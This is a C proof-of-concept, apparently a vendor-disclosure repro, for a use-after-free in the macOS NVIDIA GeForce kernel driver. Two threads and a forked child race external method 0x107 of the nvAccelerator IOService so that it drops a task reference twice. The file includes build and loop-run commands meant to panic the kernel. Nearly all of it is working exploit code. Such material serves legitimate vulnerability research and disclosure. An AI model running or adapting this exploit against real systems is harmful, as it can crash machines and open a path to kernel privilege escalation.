1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147 | /*
nvDevice::SetAppSupportBits is external method 0x107 of the nvAccelerator IOService.
It calls task_deallocate without locking. Two threads can race calling this external method to drop
two task references when only one is held.
Note that the repro forks a child which give the nvAccelerator a different task otherwise
the repro is more likely to leak task references than panic.
*/
// ianbeer
#if 0
MacOS kernel UAF due to lack of locking in nvidia GeForce driver
nvDevice::SetAppSupportBits is external method 0x107 of the nvAccelerator IOService.
It calls task_deallocate without locking. Two threads can race calling this external method to drop
two task references when only one is held.
Note that the repro forks a child which give the nvAccelerator a different task otherwise
the repro is more likely to leak task references than panic.
#endif
// build: clang -o nvtask nvtask.c -framework IOKit
// run: while true; do ./nvtask; done
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
uint64_t set_app_support_bits(mach_port_t conn) {
kern_return_t err;
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
char inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0;
inputStructCnt = 1;
outputStructCnt = 1;
inputStruct[0] = 0xff;
err = IOConnectCallMethod(
conn,
0x107,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
} else{
printf("worked?\n");
}
return 0;
}
volatile int go = 0;
volatile int running = 0;
void* thread_func(void* arg) {
mach_port_t conn = (mach_port_t)arg;
printf("thread running\n");
running = 1;
while(!go){;}
set_app_support_bits(conn);
return 0;
}
int main(int argc, char** argv){
pid_t child_pid = fork();
if (child_pid == -1) {
printf("fork failed\n");
return 0;
}
if (child_pid) {
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("nvAccelerator"));
if (service == MACH_PORT_NULL) {
printf("unable to find service\n");
return 0;
}
printf("got service: 0x%x\n", service);
io_connect_t conn = MACH_PORT_NULL;
kern_return_t err = IOServiceOpen(service, mach_task_self(), 5, &conn); // nvDevice
if (err != KERN_SUCCESS) {
printf("unable to open ioservice\n");
return 0;
}
printf("got service\n");
pthread_t th;
pthread_create(&th, NULL, thread_func, (void*)conn);
while(!running){;}
go = 1;
set_app_support_bits(conn);
pthread_join(th, NULL);
int loc = 0;
wait(&loc);
} else {
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("nvAccelerator"));
if (service == MACH_PORT_NULL) {
printf("unable to find service\n");
return 0;
}
printf("got service: 0x%x\n", service);
io_connect_t conn = MACH_PORT_NULL;
kern_return_t err = IOServiceOpen(service, mach_task_self(), 5, &conn); // nvDevice
if (err != KERN_SUCCESS) {
printf("unable to open ioservice\n");
return 0;
}
printf("got service\n");
set_app_support_bits(conn);
}
return 0;
}
|
